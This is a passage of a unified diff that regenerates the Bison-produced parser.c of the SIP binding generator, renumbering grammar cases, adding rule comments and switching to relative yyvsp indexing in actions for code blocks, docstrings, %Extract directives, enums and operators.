optaccesscode: TK_ACCESSCODE codeblock */ ++#line 2265 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4818 "../parser.c" + break; + +- case 250: +-#line 2244 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 251: /* optgetcode: %empty */ ++#line 2270 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 4826 "../parser.c" + break; + +- case 251: +-#line 2247 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); 
++ case 252: /* optgetcode: TK_GETCODE codeblock */ ++#line 2273 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4834 "../parser.c" + break; + +- case 252: +-#line 2252 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 253: /* optsetcode: %empty */ ++#line 2278 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 4842 "../parser.c" + break; + +- case 253: +-#line 2255 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 254: /* optsetcode: TK_SETCODE codeblock */ ++#line 2281 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4850 "../parser.c" + break; + +- case 254: +-#line 2260 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 255: /* copying: TK_COPYING codeblock */ ++#line 2286 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->copying, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->copying, (yyvsp[0].codeb)); + } ++#line 4859 "../parser.c" + break; + +- case 255: +-#line 2266 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 256: /* exphdrcode: TK_EXPHEADERCODE codeblock */ ++#line 2292 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tSpec->exphdrcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tSpec->exphdrcode, (yyvsp[0].codeb)); + } ++#line 4868 "../parser.c" + break; + +- case 256: +-#line 2272 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 257: /* modhdrcode: TK_MODHEADERCODE codeblock */ ++#line 2298 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->hdrcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->hdrcode, (yyvsp[0].codeb)); + } ++#line 4877 "../parser.c" + break; + +- case 257: +-#line 2278 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 258: /* typehdrcode: TK_TYPEHEADERCODE codeblock */ ++#line 2304 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4885 "../parser.c" + break; + +- case 258: +-#line 2283 "sip-4.19.23/sipgen/metasrc/parser.y" 
+- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 259: /* travcode: TK_TRAVERSECODE codeblock */ ++#line 2309 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4893 "../parser.c" + break; + +- case 259: +-#line 2288 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 260: /* clearcode: TK_CLEARCODE codeblock */ ++#line 2314 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4901 "../parser.c" + break; + +- case 260: +-#line 2293 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 261: /* getbufcode: TK_GETBUFFERCODE codeblock */ ++#line 2319 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4909 "../parser.c" + break; + +- case 261: +-#line 2298 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 262: /* releasebufcode: TK_RELEASEBUFFERCODE codeblock */ ++#line 2324 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4917 "../parser.c" + break; + +- case 262: +-#line 2303 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 263: /* readbufcode: TK_READBUFFERCODE codeblock */ ++#line 2329 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4925 "../parser.c" + break; + +- case 263: +-#line 2308 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 264: /* writebufcode: TK_WRITEBUFFERCODE codeblock */ ++#line 2334 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4933 "../parser.c" + break; + +- case 264: +-#line 2313 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 265: /* segcountcode: TK_SEGCOUNTCODE codeblock */ ++#line 2339 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4941 "../parser.c" + break; + +- case 265: +-#line 2318 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = 
(yyvsp[(2) - (2)].codeb); ++ case 266: /* charbufcode: TK_CHARBUFFERCODE codeblock */ ++#line 2344 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4949 "../parser.c" + break; + +- case 266: +-#line 2323 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 267: /* instancecode: TK_INSTANCECODE codeblock */ ++#line 2349 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4957 "../parser.c" + break; + +- case 267: +-#line 2328 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 268: /* picklecode: TK_PICKLECODE codeblock */ ++#line 2354 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4965 "../parser.c" + break; + +- case 268: +-#line 2333 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 269: /* finalcode: TK_FINALCODE codeblock */ ++#line 2359 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4973 "../parser.c" + break; + +- case 269: +-#line 2338 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 270: /* modcode: TK_MODCODE codeblock */ ++#line 2364 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->cppcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->cppcode, (yyvsp[0].codeb)); + } ++#line 4982 "../parser.c" + break; + +- case 270: +-#line 2344 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 271: /* typecode: TK_TYPECODE codeblock */ ++#line 2370 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4990 "../parser.c" + break; + +- case 271: +-#line 2349 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 272: /* preinitcode: TK_PREINITCODE codeblock */ ++#line 2375 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->preinitcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->preinitcode, (yyvsp[0].codeb)); + } ++#line 4999 "../parser.c" + break; + +- case 272: 
+-#line 2355 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 273: /* initcode: TK_INITCODE codeblock */ ++#line 2381 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->initcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->initcode, (yyvsp[0].codeb)); + } ++#line 5008 "../parser.c" + break; + +- case 273: +-#line 2361 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 274: /* postinitcode: TK_POSTINITCODE codeblock */ ++#line 2387 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->postinitcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->postinitcode, (yyvsp[0].codeb)); + } ++#line 5017 "../parser.c" + break; + +- case 274: +-#line 2367 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 275: /* unitcode: TK_UNITCODE codeblock */ ++#line 2393 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->unitcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->unitcode, (yyvsp[0].codeb)); + } ++#line 5026 "../parser.c" + break; + +- case 275: +-#line 2373 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 276: /* unitpostinccode: TK_UNITPOSTINCLUDECODE codeblock */ ++#line 2399 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->unitpostinccode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->unitpostinccode, (yyvsp[0].codeb)); + } ++#line 5035 "../parser.c" + break; + +- case 276: +-#line 2379 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 277: /* prepycode: TK_PREPYCODE codeblock */ ++#line 2405 "parser.y" ++ { + /* Deprecated. 
*/ + } ++#line 5043 "../parser.c" + break; + +- case 277: +-#line 2384 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 278: /* exptypehintcode: TK_EXPTYPEHINTCODE codeblock */ ++#line 2410 "parser.y" ++ { + if (notSkipping() && !inMainModule()) +- appendCodeBlock(¤tSpec->exptypehintcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tSpec->exptypehintcode, (yyvsp[0].codeb)); + } ++#line 5052 "../parser.c" + break; + +- case 278: +-#line 2390 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 279: /* modtypehintcode: TK_TYPEHINTCODE codeblock */ ++#line 2416 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->typehintcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->typehintcode, (yyvsp[0].codeb)); + } ++#line 5061 "../parser.c" + break; + +- case 279: +-#line 2396 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 280: /* classtypehintcode: TK_TYPEHINTCODE codeblock */ ++#line 2422 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 5069 "../parser.c" + break; + +- case 280: +-#line 2401 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 281: /* doc: TK_DOC codeblock */ ++#line 2427 "parser.y" ++ { + if (notSkipping() && inMainModule()) +- appendCodeBlock(¤tSpec->docs, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tSpec->docs, (yyvsp[0].codeb)); + } ++#line 5078 "../parser.c" + break; + +- case 281: +-#line 2407 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 282: /* exporteddoc: TK_EXPORTEDDOC codeblock */ ++#line 2433 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tSpec->docs, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tSpec->docs, (yyvsp[0].codeb)); + } ++#line 5087 "../parser.c" + break; + +- case 282: +-#line 2413 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 283: /* autopyname: TK_AUTOPYNAME autopyname_args */ ++#line 2439 "parser.y" ++ { + if (notSkipping()) +- addAutoPyName(currentModule, (yyvsp[(2) - (2)].autopyname).remove_leading); ++ 
addAutoPyName(currentModule, (yyvsp[0].autopyname).remove_leading); + } ++#line 5096 "../parser.c" + break; + +- case 283: +-#line 2419 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.autopyname) = (yyvsp[(2) - (3)].autopyname); ++ case 284: /* autopyname_args: '(' autopyname_arg_list ')' */ ++#line 2445 "parser.y" ++ { ++ (yyval.autopyname) = (yyvsp[-1].autopyname); + } ++#line 5104 "../parser.c" + break; + +- case 285: +-#line 2425 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.autopyname) = (yyvsp[(1) - (3)].autopyname); ++ case 286: /* autopyname_arg_list: autopyname_arg_list ',' autopyname_arg */ ++#line 2451 "parser.y" ++ { ++ (yyval.autopyname) = (yyvsp[-2].autopyname); + +- switch ((yyvsp[(3) - (3)].autopyname).token) ++ switch ((yyvsp[0].autopyname).token) + { +- case TK_REMOVELEADING: (yyval.autopyname).remove_leading = (yyvsp[(3) - (3)].autopyname).remove_leading; break; ++ case TK_REMOVELEADING: (yyval.autopyname).remove_leading = (yyvsp[0].autopyname).remove_leading; break; + } + } ++#line 5117 "../parser.c" + break; + +- case 286: +-#line 2435 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 287: /* autopyname_arg: TK_REMOVELEADING '=' TK_STRING_VALUE */ ++#line 2461 "parser.y" ++ { + (yyval.autopyname).token = TK_REMOVELEADING; + +- (yyval.autopyname).remove_leading = (yyvsp[(3) - (3)].text); ++ (yyval.autopyname).remove_leading = (yyvsp[0].text); + } ++#line 5127 "../parser.c" + break; + +- case 287: +-#line 2442 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 288: /* docstring: TK_DOCSTRING docstring_args codeblock */ ++#line 2468 "parser.y" ++ { + (yyval.docstr) = sipMalloc(sizeof(docstringDef)); + +- (yyval.docstr)->signature = (yyvsp[(2) - (3)].docstring).signature; +- (yyval.docstr)->text = (yyvsp[(3) - (3)].codeb)->frag; +- free((yyvsp[(3) - (3)].codeb)); ++ (yyval.docstr)->signature = (yyvsp[-1].docstring).signature; ++ (yyval.docstr)->text = (yyvsp[0].codeb)->frag; ++ free((yyvsp[0].codeb)); + + /* Format the docstring. 
*/ +- if ((yyvsp[(2) - (3)].docstring).format == deindented) ++ if ((yyvsp[-1].docstring).format == deindented) + { + const char *cp; + char *dp; +@@ -5392,159 +5210,175 @@ yyreduce: + *dp = '\0'; + } + } ++#line 5214 "../parser.c" + break; + +- case 288: +-#line 2526 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 289: /* docstring_args: %empty */ ++#line 2552 "parser.y" ++ { + (yyval.docstring).format = currentModule->defdocstringfmt; + (yyval.docstring).signature = currentModule->defdocstringsig; + } ++#line 5223 "../parser.c" + break; + +- case 289: +-#line 2530 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 290: /* docstring_args: TK_STRING_VALUE */ ++#line 2556 "parser.y" ++ { + resetLexerState(); + +- (yyval.docstring).format = convertFormat((yyvsp[(1) - (1)].text)); ++ (yyval.docstring).format = convertFormat((yyvsp[0].text)); + (yyval.docstring).signature = currentModule->defdocstringsig; + } ++#line 5234 "../parser.c" + break; + +- case 290: +-#line 2536 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.docstring) = (yyvsp[(2) - (3)].docstring); ++ case 291: /* docstring_args: '(' docstring_arg_list ')' */ ++#line 2562 "parser.y" ++ { ++ (yyval.docstring) = (yyvsp[-1].docstring); + } ++#line 5242 "../parser.c" + break; + +- case 292: +-#line 2542 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.docstring) = (yyvsp[(1) - (3)].docstring); ++ case 293: /* docstring_arg_list: docstring_arg_list ',' docstring_arg */ ++#line 2568 "parser.y" ++ { ++ (yyval.docstring) = (yyvsp[-2].docstring); + +- switch ((yyvsp[(3) - (3)].docstring).token) ++ switch ((yyvsp[0].docstring).token) + { +- case TK_FORMAT: (yyval.docstring).format = (yyvsp[(3) - (3)].docstring).format; break; +- case TK_SIGNATURE: (yyval.docstring).signature = (yyvsp[(3) - (3)].docstring).signature; break; ++ case TK_FORMAT: (yyval.docstring).format = (yyvsp[0].docstring).format; break; ++ case TK_SIGNATURE: (yyval.docstring).signature = (yyvsp[0].docstring).signature; break; + } + } 
++#line 5256 "../parser.c" + break; + +- case 293: +-#line 2553 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 294: /* docstring_arg: TK_FORMAT '=' TK_STRING_VALUE */ ++#line 2579 "parser.y" ++ { + (yyval.docstring).token = TK_FORMAT; + +- (yyval.docstring).format = convertFormat((yyvsp[(3) - (3)].text)); ++ (yyval.docstring).format = convertFormat((yyvsp[0].text)); + (yyval.docstring).signature = currentModule->defdocstringsig; + } ++#line 5267 "../parser.c" + break; + +- case 294: +-#line 2559 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 295: /* docstring_arg: TK_SIGNATURE '=' TK_STRING_VALUE */ ++#line 2585 "parser.y" ++ { + (yyval.docstring).token = TK_SIGNATURE; + + (yyval.docstring).format = currentModule->defdocstringfmt; +- (yyval.docstring).signature = convertSignature((yyvsp[(3) - (3)].text)); ++ (yyval.docstring).signature = convertSignature((yyvsp[0].text)); + } ++#line 5278 "../parser.c" + break; + +- case 295: +-#line 2567 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 296: /* optdocstring: %empty */ ++#line 2593 "parser.y" ++ { + (yyval.docstr) = NULL; + } ++#line 5286 "../parser.c" + break; + +- case 297: +-#line 2573 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].extract).id == NULL) ++ case 298: /* extract: TK_EXTRACT extract_args codeblock */ ++#line 2599 "parser.y" ++ { ++ if ((yyvsp[-1].extract).id == NULL) + yyerror("%Extract must have an 'id' argument"); + + if (notSkipping()) +- addExtractPart(currentSpec, (yyvsp[(2) - (3)].extract).id, (yyvsp[(2) - (3)].extract).order, (yyvsp[(3) - (3)].codeb)); ++ addExtractPart(currentSpec, (yyvsp[-1].extract).id, (yyvsp[-1].extract).order, (yyvsp[0].codeb)); + } ++#line 5298 "../parser.c" + break; + +- case 298: +-#line 2582 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 299: /* extract_args: TK_NAME_VALUE */ ++#line 2608 "parser.y" ++ { + resetLexerState(); + +- (yyval.extract).id = (yyvsp[(1) - (1)].text); ++ (yyval.extract).id = (yyvsp[0].text); + 
(yyval.extract).order = -1; + } ++#line 5309 "../parser.c" + break; + +- case 299: +-#line 2588 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.extract) = (yyvsp[(2) - (3)].extract); ++ case 300: /* extract_args: '(' extract_arg_list ')' */ ++#line 2614 "parser.y" ++ { ++ (yyval.extract) = (yyvsp[-1].extract); + } ++#line 5317 "../parser.c" + break; + +- case 301: +-#line 2594 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.extract) = (yyvsp[(1) - (3)].extract); ++ case 302: /* extract_arg_list: extract_arg_list ',' extract_arg */ ++#line 2620 "parser.y" ++ { ++ (yyval.extract) = (yyvsp[-2].extract); + +- switch ((yyvsp[(3) - (3)].extract).token) ++ switch ((yyvsp[0].extract).token) + { +- case TK_ID: (yyval.extract).id = (yyvsp[(3) - (3)].extract).id; break; +- case TK_ORDER: (yyval.extract).order = (yyvsp[(3) - (3)].extract).order; break; ++ case TK_ID: (yyval.extract).id = (yyvsp[0].extract).id; break; ++ case TK_ORDER: (yyval.extract).order = (yyvsp[0].extract).order; break; + } + } ++#line 5331 "../parser.c" + break; + +- case 302: +-#line 2605 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 303: /* extract_arg: TK_ID '=' TK_NAME_VALUE */ ++#line 2631 "parser.y" ++ { + (yyval.extract).token = TK_ID; + +- (yyval.extract).id = (yyvsp[(3) - (3)].text); ++ (yyval.extract).id = (yyvsp[0].text); + (yyval.extract).order = -1; + } ++#line 5342 "../parser.c" + break; + +- case 303: +-#line 2611 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 304: /* extract_arg: TK_ORDER '=' TK_NUMBER_VALUE */ ++#line 2637 "parser.y" ++ { + (yyval.extract).token = TK_ORDER; + +- if ((yyvsp[(3) - (3)].number) < 0) ++ if ((yyvsp[0].number) < 0) + yyerror("The 'order' of an %Extract directive must not be negative"); + + (yyval.extract).id = NULL; +- (yyval.extract).order = (yyvsp[(3) - (3)].number); ++ (yyval.extract).order = (yyvsp[0].number); + } ++#line 5356 "../parser.c" + break; + +- case 304: +-#line 2622 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 305: /* 
makefile: TK_MAKEFILE TK_PATH_VALUE optfilename codeblock */ ++#line 2648 "parser.y" ++ { + /* Deprecated. */ + } ++#line 5364 "../parser.c" + break; + +- case 307: +-#line 2631 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(1) - (2)].codeb); ++ case 308: /* codelines: codelines TK_CODELINE */ ++#line 2657 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[-1].codeb); + +- append(&(yyval.codeb)->frag, (yyvsp[(2) - (2)].codeb)->frag); ++ append(&(yyval.codeb)->frag, (yyvsp[0].codeb)->frag); + +- free((yyvsp[(2) - (2)].codeb)->frag); +- free((yyvsp[(2) - (2)].codeb)); ++ free((yyvsp[0].codeb)->frag); ++ free((yyvsp[0].codeb)); + } ++#line 5377 "../parser.c" + break; + +- case 308: +-#line 2641 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 309: /* $@9: %empty */ ++#line 2667 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -5554,72 +5388,80 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(4) - (4)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + + if (sectionFlags != 0 && (sectionFlags & ~(SECT_IS_PUBLIC | SECT_IS_PROT)) != 0) + yyerror("Class enums must be in the public or protected sections"); + +- if (currentSpec->genc && (yyvsp[(2) - (4)].boolean)) ++ if (currentSpec->genc && (yyvsp[-2].boolean)) + yyerror("Scoped enums not allowed in a C module"); + + currentEnum = newEnum(currentSpec, currentModule, +- currentMappedType, (yyvsp[(3) - (4)].text), &(yyvsp[(4) - (4)].optflags), sectionFlags, (yyvsp[(2) - (4)].boolean)); ++ currentMappedType, (yyvsp[-1].text), &(yyvsp[0].optflags), sectionFlags, (yyvsp[-2].boolean)); + } + } ++#line 5404 "../parser.c" + break; + +- case 310: +-#line 2665 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 311: /* optenumkey: %empty */ ++#line 2691 "parser.y" ++ { + (yyval.boolean) = FALSE; + } ++#line 5412 "../parser.c" + break; + +- case 311: +-#line 2668 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 312: /* optenumkey: TK_CLASS */ ++#line 2694 "parser.y" ++ { + 
(yyval.boolean) = TRUE; + } ++#line 5420 "../parser.c" + break; + +- case 312: +-#line 2671 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 313: /* optenumkey: TK_STRUCT */ ++#line 2697 "parser.y" ++ { + (yyval.boolean) = TRUE; + } ++#line 5428 "../parser.c" + break; + +- case 313: +-#line 2676 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 314: /* optfilename: %empty */ ++#line 2702 "parser.y" ++ { + (yyval.text) = NULL; + } ++#line 5436 "../parser.c" + break; + +- case 314: +-#line 2679 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.text) = (yyvsp[(1) - (1)].text); ++ case 315: /* optfilename: TK_PATH_VALUE */ ++#line 2705 "parser.y" ++ { ++ (yyval.text) = (yyvsp[0].text); + } ++#line 5444 "../parser.c" + break; + +- case 315: +-#line 2684 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 316: /* optname: %empty */ ++#line 2710 "parser.y" ++ { + (yyval.text) = NULL; + } ++#line 5452 "../parser.c" + break; + +- case 316: +-#line 2687 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.text) = (yyvsp[(1) - (1)].text); ++ case 317: /* optname: TK_NAME_VALUE */ ++#line 2713 "parser.y" ++ { ++ (yyval.text) = (yyvsp[0].text); + } ++#line 5460 "../parser.c" + break; + +- case 323: +-#line 2702 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 324: /* enumline: TK_NAME_VALUE optenumassign optflags optcomma */ ++#line 2728 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -5630,15 +5472,15 @@ yyreduce: + + enumMemberDef *emd, **tail; + +- checkAnnos(&(yyvsp[(3) - (4)].optflags), annos); ++ checkAnnos(&(yyvsp[-1].optflags), annos); + + /* Note that we don't use the assigned value. 
*/ + emd = sipMalloc(sizeof (enumMemberDef)); + + emd->pyname = cacheName(currentSpec, +- getPythonName(currentModule, &(yyvsp[(3) - (4)].optflags), (yyvsp[(1) - (4)].text))); +- emd->cname = (yyvsp[(1) - (4)].text); +- emd->no_typehint = getNoTypeHint(&(yyvsp[(3) - (4)].optflags)); ++ getPythonName(currentModule, &(yyvsp[-1].optflags), (yyvsp[-3].text))); ++ emd->cname = (yyvsp[-3].text); ++ emd->no_typehint = getNoTypeHint(&(yyvsp[-1].optflags)); + emd->ed = currentEnum; + emd->platforms = currentPlatforms; + emd->next = NULL; +@@ -5661,309 +5503,345 @@ yyreduce: + setIsUsedName(emd->pyname); + } + } ++#line 5507 "../parser.c" + break; + +- case 328: +-#line 2754 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 329: /* optassign: %empty */ ++#line 2780 "parser.y" ++ { + (yyval.valp) = NULL; + } ++#line 5515 "../parser.c" + break; + +- case 329: +-#line 2757 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.valp) = (yyvsp[(2) - (2)].valp); ++ case 330: /* optassign: '=' expr */ ++#line 2783 "parser.y" ++ { ++ (yyval.valp) = (yyvsp[0].valp); + } ++#line 5523 "../parser.c" + break; + +- case 331: +-#line 2763 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 332: /* expr: expr binop value */ ++#line 2789 "parser.y" ++ { + valueDef *vd; + +- if ((yyvsp[(1) - (3)].valp) -> vtype == string_value || (yyvsp[(3) - (3)].valp) -> vtype == string_value) ++ if ((yyvsp[-2].valp) -> vtype == string_value || (yyvsp[0].valp) -> vtype == string_value) + yyerror("Invalid binary operator for string"); + + /* Find the last value in the existing expression. 
*/ + +- for (vd = (yyvsp[(1) - (3)].valp); vd -> next != NULL; vd = vd -> next) ++ for (vd = (yyvsp[-2].valp); vd -> next != NULL; vd = vd -> next) + ; + +- vd -> vbinop = (yyvsp[(2) - (3)].qchar); +- vd -> next = (yyvsp[(3) - (3)].valp); ++ vd -> vbinop = (yyvsp[-1].qchar); ++ vd -> next = (yyvsp[0].valp); + +- (yyval.valp) = (yyvsp[(1) - (3)].valp); ++ (yyval.valp) = (yyvsp[-2].valp); + } ++#line 5544 "../parser.c" + break; + +- case 332: +-#line 2781 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 333: /* binop: '-' */ ++#line 2807 "parser.y" ++ { + (yyval.qchar) = '-'; + } ++#line 5552 "../parser.c" + break; + +- case 333: +-#line 2784 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 334: /* binop: '+' */ ++#line 2810 "parser.y" ++ { + (yyval.qchar) = '+'; + } ++#line 5560 "../parser.c" + break; + +- case 334: +-#line 2787 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 335: /* binop: '*' */ ++#line 2813 "parser.y" ++ { + (yyval.qchar) = '*'; + } ++#line 5568 "../parser.c" + break; + +- case 335: +-#line 2790 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 336: /* binop: '/' */ ++#line 2816 "parser.y" ++ { + (yyval.qchar) = '/'; + } ++#line 5576 "../parser.c" + break; + +- case 336: +-#line 2793 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 337: /* binop: '&' */ ++#line 2819 "parser.y" ++ { + (yyval.qchar) = '&'; + } ++#line 5584 "../parser.c" + break; + +- case 337: +-#line 2796 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 338: /* binop: '|' */ ++#line 2822 "parser.y" ++ { + (yyval.qchar) = '|'; + } ++#line 5592 "../parser.c" + break; + +- case 338: +-#line 2801 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 339: /* optunop: %empty */ ++#line 2827 "parser.y" ++ { + (yyval.qchar) = '\0'; + } ++#line 5600 "../parser.c" + break; + +- case 339: +-#line 2804 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 340: /* optunop: '!' 
*/ ++#line 2830 "parser.y" ++ { + (yyval.qchar) = '!'; + } ++#line 5608 "../parser.c" + break; + +- case 340: +-#line 2807 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 341: /* optunop: '~' */ ++#line 2833 "parser.y" ++ { + (yyval.qchar) = '~'; + } ++#line 5616 "../parser.c" + break; + +- case 341: +-#line 2810 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 342: /* optunop: '-' */ ++#line 2836 "parser.y" ++ { + (yyval.qchar) = '-'; + } ++#line 5624 "../parser.c" + break; + +- case 342: +-#line 2813 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 343: /* optunop: '+' */ ++#line 2839 "parser.y" ++ { + (yyval.qchar) = '+'; + } ++#line 5632 "../parser.c" + break; + +- case 343: +-#line 2816 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 344: /* optunop: '*' */ ++#line 2842 "parser.y" ++ { + (yyval.qchar) = '*'; + } ++#line 5640 "../parser.c" + break; + +- case 344: +-#line 2819 